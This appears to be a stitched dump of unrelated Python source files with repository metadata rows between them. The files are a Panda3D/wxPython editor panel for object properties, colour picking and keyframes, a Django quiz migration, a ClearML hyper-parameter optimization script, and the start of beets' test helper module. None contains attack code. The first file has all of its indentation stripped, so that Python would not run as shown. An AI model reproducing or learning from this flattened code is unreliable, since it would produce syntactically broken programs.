from wx.lib.embeddedimage import PyEmbeddedImage
from wx.lib.scrolledpanel import ScrolledPanel
from wx.lib.agw.cubecolourdialog import *
from direct.wxwidgets.WxSlider import *
from panda3d.core import *
from . import ObjectGlobals as OG
from . import AnimGlobals as AG
#----------------------------------------------------------------------
Key = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAIAAACQKrqGAAAAA3NCSVQICAjb4U/gAAABIElE"
"QVQokZWSMW7CQBBFZ2Z3sQ02Ni4sOS6QiLgO5yBXIMcJ1KENje8QLESH7F3FVFQIIS3eTWGJ"
"VE7Iq6Z4+tL8GVRSwmPQg94fKiIOBoNer2et/U1FRER8X6+LonBdFwB4l+p53mq1qqRUUsZx"
"nKYpBwDOuRACEQGgaRoAYETn8/l4PL4uFkqp/X6fZRlnjO12u7KqENEa43keADDGvuo6Go0A"
"wPd9YkxrzY0x4/FYKlXX9eVymc1mjIiIgiD43G4BwFprmgYRubU2DMPnySTw/ev1+pSmRISI"
"SZJ8bDan06ksSyLiQmDXCfr9fp7nb8vldDp9mc9d1/1R27XaClscxzkcDlEUhcOhvt06U1uE"
"EMaYtpbOXlu01vf5Hz/wDRuDdIDl5WtQAAAAAElFTkSuQmCC")
#----------------------------------------------------------------------
class AnimFileDrop(wx.FileDropTarget):
def __init__(self, editor):
wx.FileDropTarget.__init__(self)
self.editor = editor
def OnDropFiles(self, x, y, filenames):
obj = self.editor.objectMgr.findObjectByNodePath(base.direct.selected.last)
if obj is None:
return
objDef = obj[OG.OBJ_DEF]
if not objDef.actor:
return
objNP = obj[OG.OBJ_NP]
for filename in filenames:
name = os.path.basename(filename)
animName = Filename.fromOsSpecific(filename).getFullpath()
if name.endswith('.mb') or\
name.endswith('.ma'):
self.editor.convertMaya(animName, self.editor.ui.protoPaletteUI.addNewItem, obj, isAnim=True)
return
if animName not in objDef.anims:
objDef.anims.append(animName)
objNP.loadAnims({name:animName})
objNP.loop(name)
obj[OG.OBJ_ANIM] = animName
self.editor.ui.objectPropertyUI.updateProps(obj)
class ObjectPropUI(wx.Panel):
"""
Base class for ObjectPropUIs,
It consists of label area and ui area.
"""
def __init__(self, parent, label):
wx.Panel.__init__(self, parent)
self.parent = parent
self.labelPane = wx.Panel(self)
self.label = wx.StaticText(self.labelPane, label=label)
self.labelSizer = wx.BoxSizer(wx.HORIZONTAL)
self.labelSizer.Add(self.label)
bmpKey = Key.GetBitmap()
self.setKeyButton = wx.BitmapButton(self.labelPane, -1, bmpKey, size = (15,15),style = wx.BU_AUTODRAW)
self.labelSizer.Add(self.setKeyButton)
self.labelPane.SetSizer(self.labelSizer)
self.uiPane = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.labelPane)
sizer.Add(self.uiPane, 1, wx.EXPAND, 0)
self.SetSizer(sizer)
self.setKeyButton.Bind(wx.EVT_BUTTON, self.onKey)
def onKey(self,evt):
self.parent = wx.GetTopLevelParent(self)
if self.parent.editor.mode == self.parent.editor.ANIM_MODE:
obj= self.parent.editor.objectMgr.findObjectByNodePath(base.direct.selected.last)
objUID = obj[OG.OBJ_UID]
propertyName = self.label.GetLabelText()
value = self.getValue()
frame = self.parent.editor.ui.animUI.curFrame
if (objUID, propertyName) in self.parent.editor.animMgr.keyFramesInfo:
for i in range(len(self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)])):
if self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)][i][AG.FRAME] == frame:
del self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)][i]
self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)].append([frame, value, [], []])
#sort keyFrameInfo list by the order of frame number
sortKeyList = self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)]
for i in range(0, len(sortKeyList)-1):
for j in range(i+1, len(sortKeyList)):
if sortKeyList[i][AG.FRAME]>sortKeyList[j][AG.FRAME]:
temp = sortKeyList[i]
sortKeyList[i] = sortKeyList[j]
sortKeyList[j] = temp
self.parent.editor.animMgr.generateSlope(self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)])
else:
self.parent.editor.animMgr.keyFramesInfo[(objUID,propertyName)] = [[frame, value, [], []]]
exist = False
for keyFrame in self.parent.editor.animMgr.keyFrames:
if frame == keyFrame:
exist = True
break
if exist == False:
self.parent.editor.animMgr.keyFrames.append(frame)
self.parent.editor.ui.animUI.OnPropKey()
else:
self.parent.editor.ui.animUI.OnPropKey()
else:
evt.Skip()
def setValue(self, value):
self.ui.SetValue(value)
def getValue(self):
return self.ui.GetValue()
def bindFunc(self, inFunc, outFunc, valFunc = None):
self.ui.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.ui.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
if valFunc:
self.ui.Bind(self.eventType, valFunc)
class ObjectPropUIEntry(ObjectPropUI):
""" UI for string value properties """
def __init__(self, parent, label):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.TextCtrl(self.uiPane, -1)
self.eventType = wx.EVT_TEXT_ENTER
self.Layout()
def setValue(self, value):
self.ui.SetValue(str(value))
class ObjectPropUISlider(ObjectPropUI):
""" UI for float value properties """
def __init__(self, parent, label, value, minValue, maxValue):
ObjectPropUI.__init__(self, parent, label)
self.ui = WxSlider(self.uiPane, -1, value, minValue, maxValue,
pos = (0,0), size=(140, -1),
style=wx.SL_HORIZONTAL | wx.SL_LABELS)
self.ui.Enable()
self.Layout()
def bindFunc(self, inFunc, outFunc, valFunc = None):
self.ui.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.ui.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
self.ui.textValue.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.ui.textValue.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
if valFunc:
self.ui.bindFunc(valFunc)
class ObjectPropUISpinner(ObjectPropUI):
""" UI for int value properties """
def __init__(self, parent, label, value, minValue, maxValue):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.SpinCtrl(self.uiPane, -1, "", min=minValue, max=maxValue, initial=value)
self.eventType = wx.EVT_SPIN
self.Layout()
class ObjectPropUICheck(ObjectPropUI):
def __init__(self, parent, label, value):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.CheckBox(self.uiPane, -1, "", size=(50, 30))
self.setValue(value)
self.eventType = wx.EVT_CHECKBOX
self.Layout()
class ObjectPropUIRadio(ObjectPropUI):
def __init__(self, parent, label, value, valueList):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.RadioBox(self.uiPane, -1, "", choices=valueList, majorDimension=1, style=wx.RA_SPECIFY_COLS)
self.setValue(value)
self.eventType = wx.EVT_RADIOBOX
self.Layout()
def setValue(self, value):
self.ui.SetStringSelection(value)
def getValue(self):
return self.ui.GetStringSelection()
class ObjectPropUICombo(ObjectPropUI):
def __init__(self, parent, label, value, valueList, obj=None, callBack=None):
ObjectPropUI.__init__(self, parent, label)
self.ui = wx.Choice(self.uiPane, -1, choices=valueList)
if callBack is not None:
button = wx.Button(self.labelPane, -1, 'Update', size = (100, 18))
button.Bind(wx.EVT_BUTTON, lambda p0=None, p1=obj, p2=self: callBack(p0, p1, p2))
self.labelSizer.Add(button)
self.setValue(value)
self.eventType = wx.EVT_CHOICE
self.Layout()
def setValue(self, value):
self.ui.SetStringSelection(value)
def getValue(self):
return self.ui.GetStringSelection()
def setItems(self, valueList):
self.ui.SetItems(valueList)
class ObjectPropUITime(wx.Panel):
def __init__(self, parent, label, value):
wx.Panel.__init__(self, parent)
self.parent = parent
self.labelPane = wx.Panel(self)
self.label = wx.StaticText(self.labelPane, label=label)
self.labelSizer = wx.BoxSizer(wx.HORIZONTAL)
self.labelSizer.Add(self.label)
self.labelPane.SetSizer(self.labelSizer)
self.uiPane = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.labelPane)
sizer.Add(self.uiPane, 1, wx.EXPAND, 0)
self.SetSizer(sizer)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
self.uiAmPm = wx.Choice(self.uiPane, -1, choices=['AM', 'PM'])
self.uiHour = wx.Choice(self.uiPane, -1, choices=[str(x) for x in range(1, 13)])
self.uiMin = wx.Choice(self.uiPane, -1, choices=[str(x) for x in range(0, 60, 15)])
hSizer.Add(self.uiAmPm)
hSizer.Add(self.uiHour)
hSizer.Add(self.uiMin)
self.uiPane.SetSizer(hSizer)
self.setValue(value)
self.eventType = wx.EVT_CHOICE
self.Layout()
def setValue(self, value):
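        # 'value' packs the time into one float: whole hours (0-23) plus the minutes
        # as a fraction in quarter-hour steps, e.g. 13.25 -> 1:15 PM.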
hourVal = int(math.floor(value))
minVal = [0, 15, 30, 45][int((value - hourVal) * 4)]
if hourVal > 11:
ampmStr = 'PM'
hourVal = hourVal - 12
else:
ampmStr = 'AM'
if hourVal == 0:
hourVal = 12
self.uiAmPm.SetStringSelection(ampmStr)
self.uiHour.SetStringSelection(str(hourVal))
self.uiMin.SetStringSelection(str(minVal))
def getValue(self):
ampmStr = self.uiAmPm.GetStringSelection()
hourVal = int(self.uiHour.GetStringSelection())
if hourVal == 12:
hourVal = 0
if ampmStr == 'PM':
hourVal += 12
minVal = float(self.uiMin.GetStringSelection())
value = float(hourVal) + minVal / 60.0
return value
def bindFunc(self, inFunc, outFunc, valFunc = None):
self.uiAmPm.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.uiAmPm.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
self.uiHour.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.uiHour.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
self.uiMin.Bind(wx.EVT_ENTER_WINDOW, inFunc)
self.uiMin.Bind(wx.EVT_LEAVE_WINDOW, outFunc)
if valFunc:
self.uiAmPm.Bind(self.eventType, valFunc)
self.uiHour.Bind(self.eventType, valFunc)
self.uiMin.Bind(self.eventType, valFunc)
class ColorPicker(CubeColourDialog):
def __init__(self, parent, colourData=None, style=CCD_SHOW_ALPHA, alpha = 255, updateCB=None, exitCB=None):
self.updateCB=updateCB
CubeColourDialog.__init__(self, parent, colourData, style)
self.okButton.Hide()
self.cancelButton.Hide()
self._colour.alpha = alpha
self.alphaSpin.SetValue(self._colour.alpha)
self.DrawAlpha()
if exitCB:
self.Bind(wx.EVT_CLOSE, exitCB)
def SetPanelColours(self):
self.oldColourPanel.RefreshColour(self._oldColour)
self.newColourPanel.RefreshColour(self._colour)
if self.updateCB:
self.updateCB(self._colour.r, self._colour.g, self._colour.b, self._colour.alpha)
class ObjectPropertyUI(ScrolledPanel):
def __init__(self, parent, editor):
self.editor = editor
self.colorPicker = None
self.lastColorPickerPos = None
self.lastPropTab = None
ScrolledPanel.__init__(self, parent)
parentSizer = wx.BoxSizer(wx.VERTICAL)
parentSizer.Add(self, 1, wx.EXPAND, 0)
parent.SetSizer(parentSizer); parent.Layout()
self.SetDropTarget(AnimFileDrop(self.editor))
def clearPropUI(self):
sizer = self.GetSizer()
if sizer is not None:
self.lastPropTab = self.nb.GetCurrentPage().GetName()
sizer.Remove(self.propPane)
self.propPane.Destroy()
self.SetSizer(None)
self.Layout()
self.SetupScrolling(self, scroll_y = True, rate_y = 20)
def colorPickerExitCB(self, evt=None):
self.lastColorPickerPos = self.colorPicker.GetPosition()
self.colorPicker.Destroy()
self.colorPicker = None
def colorPickerUpdateCB(self, rr, gg, bb, aa):
r = rr / 255.0
g = gg / 255.0
b = bb / 255.0
a = aa / 255.0
self.propCR.setValue(r)
self.propCG.setValue(g)
self.propCB.setValue(b)
self.propCA.setValue(a)
self.editor.objectMgr.updateObjectColor(r, g, b, a)
def onColorSlider(self, evt):
r = float(self.editor.ui.objectPropertyUI.propCR.getValue())
g = float(self.editor.ui.objectPropertyUI.propCG.getValue())
b = float(self.editor.ui.objectPropertyUI.propCB.getValue())
a = float(self.editor.ui.objectPropertyUI.propCA.getValue())
if self.colorPicker:
evtObj = evt.GetEventObject()
if evtObj == self.propCR.ui or\
evtObj == self.propCR.ui.textValue:
self.colorPicker.redSpin.SetValue(r * 255)
self.colorPicker.AssignColourValue('r', r * 255, 255, 0)
elif evtObj == self.propCG.ui or\
evtObj == self.propCG.ui.textValue:
self.colorPicker.greenSpin.SetValue(g * 255)
self.colorPicker.AssignColourValue('g', g * 255, 255, 0)
elif evtObj == self.propCB.ui or\
evtObj == self.propCB.ui.textValue:
self.colorPicker.blueSpin.SetValue(b * 255)
self.colorPicker.AssignColourValue('b', b * 255, 255, 0)
else:
self.colorPicker._colour.alpha = a * 255
self.colorPicker.alphaSpin.SetValue(self.colorPicker._colour.alpha)
self.colorPicker.DrawAlpha()
self.editor.objectMgr.updateObjectColor(r, g, b, a)
def openColorPicker(self, evt, colourData, alpha):
if self.colorPicker:
self.lastColorPickerPos = self.colorPicker.GetPosition()
self.colorPicker.Destroy()
self.colorPicker = ColorPicker(self, colourData, alpha=alpha, updateCB=self.colorPickerUpdateCB, exitCB=self.colorPickerExitCB)
self.colorPicker.GetColourData().SetChooseFull(True)
self.colorPicker.Show()
if self.lastColorPickerPos:
self.colorPicker.SetPosition(self.lastColorPickerPos)
def updateProps(self, obj, movable=True):
self.clearPropUI()
self.propPane = wx.Panel(self)
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(self.propPane, 1, wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.nb = wx.Notebook(self.propPane, style=wx.NB_BOTTOM)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.nb, 1, wx.EXPAND)
self.propPane.SetSizer(sizer)
self.transformPane = wx.Panel(self.nb, -1, name='Transform')
self.nb.AddPage(self.transformPane, 'Transform')
self.propX = ObjectPropUIEntry(self.transformPane, 'X')
self.propY = ObjectPropUIEntry(self.transformPane, 'Y')
self.propZ = ObjectPropUIEntry(self.transformPane, 'Z')
self.propH = ObjectPropUISlider(self.transformPane, 'H', 0, 0, 360)
self.propP = ObjectPropUISlider(self.transformPane, 'P', 0, 0, 360)
self.propR = ObjectPropUISlider(self.transformPane, 'R', 0, 0, 360)
self.propSX = ObjectPropUIEntry(self.transformPane, 'SX')
self.propSY = ObjectPropUIEntry(self.transformPane, 'SY')
self.propSZ = ObjectPropUIEntry(self.transformPane, 'SZ')
transformProps = [self.propX, self.propY, self.propZ, self.propH, self.propP, self.propR,
self.propSX, self.propSY, self.propSZ]
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddMany(transformProps)
self.transformPane.SetSizer(sizer)
for transformProp in transformProps:
transformProp.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
self.editor.objectMgr.updateObjectTransform)
if not movable:
for transformProp in transformProps:
transformProp.ui.Disable()
self.lookPane = wx.Panel(self.nb, -1, name='Look')
self.nb.AddPage(self.lookPane, 'Look')
objNP = obj[OG.OBJ_NP]
objRGBA = obj[OG.OBJ_RGBA]
self.propCR = ObjectPropUISlider(self.lookPane, 'CR', objRGBA[0], 0, 1)
self.propCG = ObjectPropUISlider(self.lookPane, 'CG', objRGBA[1], 0, 1)
self.propCB = ObjectPropUISlider(self.lookPane, 'CB', objRGBA[2], 0, 1)
self.propCA = ObjectPropUISlider(self.lookPane, 'CA', objRGBA[3], 0, 1)
colorProps = [self.propCR, self.propCG, self.propCB, self.propCA]
for colorProp in colorProps:
colorProp.ui.bindFunc(self.onColorSlider)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddMany(colorProps)
button = wx.Button(self.lookPane, -1, 'Color Picker', (0,0), (140, 20))
_colourData = wx.ColourData()
_colourData.SetColour(wx.Colour(objRGBA[0] * 255, objRGBA[1] * 255, objRGBA[2] * 255))
button.Bind(wx.EVT_BUTTON, lambda p0=None, p1=_colourData, p2=objRGBA[3] * 255: self.openColorPicker(p0, p1, p2))
sizer.Add(button)
if self.colorPicker:
self.openColorPicker(None, _colourData, objRGBA[3] * 255)
objDef = obj[OG.OBJ_DEF]
if objDef.updateModelFunction is not None or (objDef.model is not None and len(objDef.models) > 0):
defaultModel = obj[OG.OBJ_MODEL]
if defaultModel is None:
defaultModel = ''
if len(objDef.models) == 0:
modelList = ''
else:
modelList = objDef.models
propUI = ObjectPropUICombo(self.lookPane, 'model', defaultModel, modelList, obj, callBack=objDef.updateModelFunction)
sizer.Add(propUI)
propUI.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
lambda p0=None, p1=obj: self.editor.objectMgr.updateObjectModelFromUI(p0, p1))
animList = objDef.animDict.get(obj[OG.OBJ_MODEL])
if len(objDef.anims) > 0 or animList:
if animList is None:
animList = objDef.anims
propUI = ObjectPropUICombo(self.lookPane, 'anim', obj[OG.OBJ_ANIM], animList)
sizer.Add(propUI)
propUI.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
lambda p0=None, p1=obj: self.editor.objectMgr.updateObjectAnimFromUI(p0, p1))
self.lookPane.SetSizer(sizer)
self.propsPane = wx.Panel(self.nb, -1, name='Properties')
self.nb.AddPage(self.propsPane, 'Properties')
sizer = wx.BoxSizer(wx.VERTICAL)
propNames = objDef.orderedProperties[:]
for key in list(objDef.properties.keys()):
if key not in propNames:
propNames.append(key)
for key in propNames:
# handling properties mask
propMask = BitMask32()
for modeKey in list(objDef.propertiesMask.keys()):
if key in objDef.propertiesMask[modeKey]:
propMask |= modeKey
if not propMask.isZero():
if (self.editor.mode & propMask).isZero():
continue
propDef = objDef.properties[key]
propType = propDef[OG.PROP_TYPE]
propDataType = propDef[OG.PROP_DATATYPE]
value = obj[OG.OBJ_PROP].get(key)
if propType == OG.PROP_UI_ENTRY:
propUI = ObjectPropUIEntry(self.propsPane, key)
propUI.setValue(value)
sizer.Add(propUI)
elif propType == OG.PROP_UI_SLIDE:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
if propDataType != OG.PROP_FLOAT:
value = float(value)
propUI = ObjectPropUISlider(self.propsPane, key, value, propRange[OG.RANGE_MIN], propRange[OG.RANGE_MAX])
sizer.Add(propUI)
elif propType == OG.PROP_UI_SPIN:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
propUI = ObjectPropUISpinner(self.propsPane, key, value, propRange[OG.RANGE_MIN], propRange[OG.RANGE_MAX])
sizer.Add(propUI)
elif propType == OG.PROP_UI_CHECK:
if value is None:
continue
propUI = ObjectPropUICheck(self.propsPane, key, value)
sizer.Add(propUI)
elif propType == OG.PROP_UI_RADIO:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
if propDataType != OG.PROP_STR:
for i in range(len(propRange)):
propRange[i] = str(propRange[i])
value = str(value)
propUI = ObjectPropUIRadio(self.propsPane, key, value, propRange)
sizer.Add(propUI)
elif propType == OG.PROP_UI_COMBO:
if len(propDef) <= OG.PROP_RANGE:
continue
propRange = propDef[OG.PROP_RANGE]
if value is None:
continue
if propDataType != OG.PROP_STR:
for i in range(len(propRange)):
propRange[i] = str(propRange[i])
value = str(value)
propUI = ObjectPropUICombo(self.propsPane, key, value, propRange)
sizer.Add(propUI)
elif propType == OG.PROP_UI_COMBO_DYNAMIC:
if len(propDef) <= OG.PROP_DYNAMIC_KEY:
continue
propDynamicKey = propDef[OG.PROP_DYNAMIC_KEY]
if propDynamicKey == OG.PROP_MODEL:
dynamicRangeKey = obj[OG.OBJ_MODEL]
else:
dynamicRangeKey = obj[OG.OBJ_PROP].get(propDynamicKey)
if dynamicRangeKey is None:
self.editor.objectMgr.updateObjectPropValue(obj, key, propDef[OG.PROP_DEFAULT], fUndo=False)
continue
propRange = propDef[OG.PROP_RANGE].get(dynamicRangeKey)
if propRange is None:
self.editor.objectMgr.updateObjectPropValue(obj, key, propDef[OG.PROP_DEFAULT], fUndo=False)
continue
if value is None:
continue
if propDataType != OG.PROP_STR:
for i in range(len(propRange)):
propRange[i] = str(propRange[i])
value = str(value)
if value not in propRange:
value = propRange[0]
self.editor.objectMgr.updateObjectPropValue(obj, key, value, fUndo=False)
propUI = ObjectPropUICombo(self.propsPane, key, value, propRange)
sizer.Add(propUI)
elif propType == OG.PROP_UI_TIME:
if value is None:
continue
propUI = ObjectPropUITime(self.propsPane, key, value)
sizer.Add(propUI)
else:
                # unsupported property type
continue
propUI.bindFunc(self.editor.objectMgr.onEnterObjectPropUI,
self.editor.objectMgr.onLeaveObjectPropUI,
lambda p0=None, p1=obj, p2=key: self.editor.objectMgr.updateObjectProperty(p0, p1, p2))
self.propsPane.SetSizer(sizer);
self.Layout()
self.SetupScrolling(self, scroll_y = True, rate_y = 20)
if self.lastPropTab == 'Transform':
self.nb.SetSelection(0)
elif self.lastPropTab == 'Look':
self.nb.SetSelection(1)
elif self.lastPropTab == 'Properties':
self.nb.SetSelection(2)
| 38.546012 | 135 | 0.601186 |
3bdbc57e6c9160968d901e24d36de53e168f646a | 1,454 | py | Python | quiz/migrations/0002_auto_20170613_1345.py | mblacklock/sohkahtoa | 89623b436dc1adf482308f22aa1eba81db343fde | [
"MIT"
] | null | null | null | quiz/migrations/0002_auto_20170613_1345.py | mblacklock/sohkahtoa | 89623b436dc1adf482308f22aa1eba81db343fde | [
"MIT"
] | null | null | null | quiz/migrations/0002_auto_20170613_1345.py | mblacklock/sohkahtoa | 89623b436dc1adf482308f22aa1eba81db343fde | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-06-13 12:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('topics', '0001_initial'),
('quiz', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='TopicQuiz',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('out_of', models.IntegerField()),
('topic', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='topics.Topic')),
],
options={
'verbose_name_plural': 'Topic Quizzes',
},
),
migrations.AlterModelOptions(
name='subtopicquiz',
options={'verbose_name_plural': 'Subtopic Quizzes'},
),
]
| 34.619048 | 128 | 0.585282 |
0553108a51f48b2d5a6526aa436c0041a1bafe4e | 6,632 | py | Python | examples/optimization/hyper-parameter-optimization/hyper_parameter_optimizer.py | thepycoder/clearml | 717edba8c2b39fb7486bd2aba9ca0294f309b4c3 | [
"Apache-2.0"
] | 2,097 | 2019-06-11T14:36:25.000Z | 2020-12-21T03:52:59.000Z | examples/optimization/hyper-parameter-optimization/hyper_parameter_optimizer.py | thepycoder/clearml | 717edba8c2b39fb7486bd2aba9ca0294f309b4c3 | [
"Apache-2.0"
] | 247 | 2019-06-11T15:10:26.000Z | 2020-12-21T17:34:32.000Z | examples/optimization/hyper-parameter-optimization/hyper_parameter_optimizer.py | thepycoder/clearml | 717edba8c2b39fb7486bd2aba9ca0294f309b4c3 | [
"Apache-2.0"
] | 256 | 2019-06-11T14:36:28.000Z | 2020-12-18T08:32:47.000Z | import logging
from clearml import Task
from clearml.automation import (
DiscreteParameterRange, HyperParameterOptimizer, RandomSearch,
UniformIntegerParameterRange)
# trying to load Bayesian optimizer package
try:
from clearml.automation.optuna import OptimizerOptuna # noqa
aSearchStrategy = OptimizerOptuna
except ImportError as ex:
try:
from clearml.automation.hpbandster import OptimizerBOHB # noqa
aSearchStrategy = OptimizerBOHB
except ImportError as ex:
logging.getLogger().warning(
'Apologies, it seems you do not have \'optuna\' or \'hpbandster\' installed, '
'we will be using RandomSearch strategy instead')
aSearchStrategy = RandomSearch
def job_complete_callback(
job_id, # type: str
objective_value, # type: float
objective_iteration, # type: int
job_parameters, # type: dict
top_performance_job_id # type: str
):
print('Job completed!', job_id, objective_value, objective_iteration, job_parameters)
if job_id == top_performance_job_id:
print('WOOT WOOT we broke the record! Objective reached {}'.format(objective_value))
# Connecting ClearML with the current process,
# from here on everything is logged automatically
task = Task.init(project_name='Hyper-Parameter Optimization',
task_name='Automatic Hyper-Parameter Optimization',
task_type=Task.TaskTypes.optimizer,
reuse_last_task_id=False)
# experiment template to optimize in the hyper-parameter optimization
args = {
'template_task_id': None,
'run_as_service': False,
}
args = task.connect(args)
# Get the template task experiment that we want to optimize
if not args['template_task_id']:
args['template_task_id'] = Task.get_task(
project_name='examples', task_name='Keras HP optimization base').id
# Set default queue name for the Training tasks themselves.
# later can be overridden in the UI
execution_queue = '1xGPU'
# Example use case:
an_optimizer = HyperParameterOptimizer(
# This is the experiment we want to optimize
base_task_id=args['template_task_id'],
# here we define the hyper-parameters to optimize
# Notice: The parameter name should exactly match what you see in the UI: <section_name>/<parameter>
# For Example, here we see in the base experiment a section Named: "General"
# under it a parameter named "batch_size", this becomes "General/batch_size"
# If you have `argparse` for example, then arguments will appear under the "Args" section,
# and you should instead pass "Args/batch_size"
hyper_parameters=[
UniformIntegerParameterRange('General/layer_1', min_value=128, max_value=512, step_size=128),
UniformIntegerParameterRange('General/layer_2', min_value=128, max_value=512, step_size=128),
DiscreteParameterRange('General/batch_size', values=[96, 128, 160]),
DiscreteParameterRange('General/epochs', values=[30]),
],
# this is the objective metric we want to maximize/minimize
objective_metric_title='epoch_accuracy',
objective_metric_series='epoch_accuracy',
# now we decide if we want to maximize it or minimize it (accuracy we maximize)
objective_metric_sign='max',
# let us limit the number of concurrent experiments,
    # this in turn will make sure we don't bombard the scheduler with experiments.
    # if we have an auto-scaler connected, this, by proxy, will limit the number of machines
max_number_of_concurrent_tasks=2,
# this is the optimizer class (actually doing the optimization)
# Currently, we can choose from GridSearch, RandomSearch or OptimizerBOHB (Bayesian optimization Hyper-Band)
# more are coming soon...
optimizer_class=aSearchStrategy,
# Select an execution queue to schedule the experiments for execution
execution_queue=execution_queue,
# If specified all Tasks created by the HPO process will be created under the `spawned_project` project
spawn_project=None, # 'HPO spawn project',
# If specified only the top K performing Tasks will be kept, the others will be automatically archived
save_top_k_tasks_only=None, # 5,
# Optional: Limit the execution time of a single experiment, in minutes.
# (this is optional, and if using OptimizerBOHB, it is ignored)
time_limit_per_job=10.,
    # Checking the experiments every 12 seconds is way too often; we should probably set it to 5 min,
# assuming a single experiment is usually hours...
pool_period_min=0.2,
# set the maximum number of jobs to launch for the optimization, default (None) unlimited
    # If OptimizerBOHB is used, it defines the maximum budget in terms of full jobs
# basically the cumulative number of iterations will not exceed total_max_jobs * max_iteration_per_job
total_max_jobs=10,
# set the minimum number of iterations for an experiment, before early stopping.
# Does not apply for simple strategies such as RandomSearch or GridSearch
min_iteration_per_job=10,
# Set the maximum number of iterations for an experiment to execute
# (This is optional, unless using OptimizerBOHB where this is a must)
max_iteration_per_job=30,
)
# if we are running as a service, just enqueue ourselves into the services queue and let it run the optimization
if args['run_as_service']:
# if this code is executed by `clearml-agent` the function call does nothing.
# if executed locally, the local process will be terminated, and a remote copy will be executed instead
task.execute_remotely(queue_name='services', exit_process=True)
# report every 12 seconds, this is way too often, but we are testing here :)
an_optimizer.set_report_period(2.2)
# start the optimization process, callback function to be called every time an experiment is completed
# this function returns immediately
an_optimizer.start(job_complete_callback=job_complete_callback)
# You can also use the line below instead to run all the optimizer tasks locally, without using queues or agent
# an_optimizer.start_locally(job_complete_callback=job_complete_callback)
# set the time limit for the optimization process (2 hours)
an_optimizer.set_time_limit(in_minutes=120.0)
# wait until process is done (notice we are controlling the optimization process in the background)
an_optimizer.wait()
# optimization is completed, print the top performing experiments id
top_exp = an_optimizer.get_top_experiments(top_k=3)
print([t.id for t in top_exp])
# make sure background optimization stopped
an_optimizer.stop()
print('We are done, good bye')
| 49.125926 | 112 | 0.747889 |
11f71a6318c743f31c72209074768be4f9cfc783 | 9,757 | py | Python | test/_common.py | awesome-archive/beets | 44f33cabc7e2c5ea6fd79fac3b73ac54fa11d568 | [
"MIT"
] | null | null | null | test/_common.py | awesome-archive/beets | 44f33cabc7e2c5ea6fd79fac3b73ac54fa11d568 | [
"MIT"
] | null | null | null | test/_common.py | awesome-archive/beets | 44f33cabc7e2c5ea6fd79fac3b73ac54fa11d568 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Some common functionality for beets' test cases."""
from __future__ import division, absolute_import, print_function
import time
import sys
import os
import tempfile
import shutil
import six
import unittest
from contextlib import contextmanager
# Mangle the search path to include the beets sources.
sys.path.insert(0, '..')
import beets.library # noqa: E402
from beets import importer, logging # noqa: E402
from beets.ui import commands # noqa: E402
from beets import util # noqa: E402
import beets # noqa: E402
# Make sure the development versions of the plugins are used
import beetsplug # noqa: E402
beetsplug.__path__ = [os.path.abspath(
os.path.join(__file__, '..', '..', 'beetsplug')
)]
# Test resources path.
RSRC = util.bytestring_path(os.path.join(os.path.dirname(__file__), 'rsrc'))
PLUGINPATH = os.path.join(os.path.dirname(__file__), 'rsrc', 'beetsplug')
# Propagate to root logger so nosetest can capture it
log = logging.getLogger('beets')
log.propagate = True
